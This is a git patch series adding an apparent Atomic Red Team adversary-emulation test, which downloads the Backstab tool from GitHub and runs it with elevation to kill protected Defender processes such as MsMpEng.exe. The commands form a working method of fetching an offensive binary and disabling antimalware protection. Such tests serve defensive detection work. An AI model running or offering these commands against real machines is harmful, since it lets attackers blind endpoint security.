From 4e6ac8d9456b710b0c6260e08bff60a634d68141 Mon Sep 17 00:00:00 2001
From: jovial7 <37297486+jovial7@users.noreply.github.com>
Date: Tue, 26 Apr 2022 11:45:58 -0500
Subject: [PATCH 1/2] Add new test

New test to Kill antimalware protected processes using Backstab
---
 atomics/T1562.001/T1562.001.yaml | 22 ++++++++++++++++++++++
 1 file changed, 22 insertions(+)

diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index d04bc2f6..398a10a8 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -612,3 +612,25 @@ atomic_tests:
       Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
     name: powershell
     elevation_required: true
+- name: Kill antimalware protected processes using Backstab
+  description: |-
+    Backstab loads Process Explorer driver which is signed by Microsoft and use it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which is otherwise not possible to kill.
+  
+    https://github.com/Yaxser/Backstab
+  supported_platforms:
+  - windows
+  input_arguments:
+    process_name:
+      description: Name of the protected process you want to kill/terminate.
+      type: string
+      default: MsMpEng.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: Backstab64.exe should exist in %temp%
+    prereq_command: if (Test-Path $env:temp\Backstab64.exe) {exit 0} else {exit 1}
+    get_prereq_command: Start-BitsTransfer -Source "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -Destination "$env:temp\Backstab64.exe" -dynamic
+  executor:
+    command: 'cd $env:temp\; .\Backstab64.exe -k -n #{process_name}'
+    name: powershell
+    elevation_required: true
+  

From 1f56b44eb4bc542d7a2f8187f9ea69bdfc023b21 Mon Sep 17 00:00:00 2001
From: jovial7 <37297486+jovial7@users.noreply.github.com>
Date: Tue, 26 Apr 2022 13:22:02 -0500
Subject: [PATCH 2/2] update execution command

---
 atomics/T1562.001/T1562.001.yaml | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index 398a10a8..f5184794 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -615,7 +615,6 @@ atomic_tests:
 - name: Kill antimalware protected processes using Backstab
   description: |-
     Backstab loads Process Explorer driver which is signed by Microsoft and use it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which is otherwise not possible to kill.
-  
     https://github.com/Yaxser/Backstab
   supported_platforms:
   - windows
@@ -630,7 +629,7 @@ atomic_tests:
     prereq_command: if (Test-Path $env:temp\Backstab64.exe) {exit 0} else {exit 1}
     get_prereq_command: Start-BitsTransfer -Source "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -Destination "$env:temp\Backstab64.exe" -dynamic
   executor:
-    command: 'cd $env:temp\; .\Backstab64.exe -k -n #{process_name}'
+    command: '& $env:temp\Backstab64.exe -k -n #{process_name}'
     name: powershell
     elevation_required: true